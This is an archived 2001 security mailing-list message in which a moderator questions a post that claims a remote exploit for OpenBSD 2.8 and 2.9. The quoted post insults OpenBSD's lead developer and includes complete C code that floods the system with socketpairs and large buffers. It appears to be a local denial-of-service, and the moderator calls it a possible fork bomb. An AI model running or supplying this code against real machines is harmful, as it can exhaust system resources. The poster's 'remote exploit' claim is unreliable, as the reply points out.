I let this through so that it might be refuted. Now, I'm no expert on the socket calls... but it seems to me that if this were a remote exploit, there would have to be a destination IP address..or port number.. or, you know, some sort of shellcode or something. So what is it then, a fork bomb for the machine that runs it? Ryan Fsck Theo Dumbraadt wrote: > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9 > > and can now be released to the public to break theo's 4 years without > > remote exploits sayings. I wrote it while people told me it could not > > happen on the list so here is your proofs bitch. > > // > > // peewee.c > > // peewee herman prove of consept this code will show all of the > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is > > // not more than a liar copyraadt 2001 by Jigglypuff > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg > > // this proggie is GPL licensed to those who use it keep my > > // credits and not be a lamer > > // > > #include <unistd.h> > > #include <sys/socket.h> > > #include <fcntl.h> > > #define BUFFERSIZE 409600 > > extern int > > main(void) > > { > > int p[2], i; > > char crap[BUFFERSIZE]; > > while (1) > > { > > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > > break; > > i = BUFFERSIZE; > > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > fcntl(p[0], F_SETFL, O_NONBLOCK); > > fcntl(p[1], F_SETFL, O_NONBLOCK); > > write(p[0], crap, BUFFERSIZE); > > write(p[1], crap, BUFFERSIZE); > > } > > return(0); > > } > > * Get your free email at http://www.inbox.net
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 10:29:08 PDT
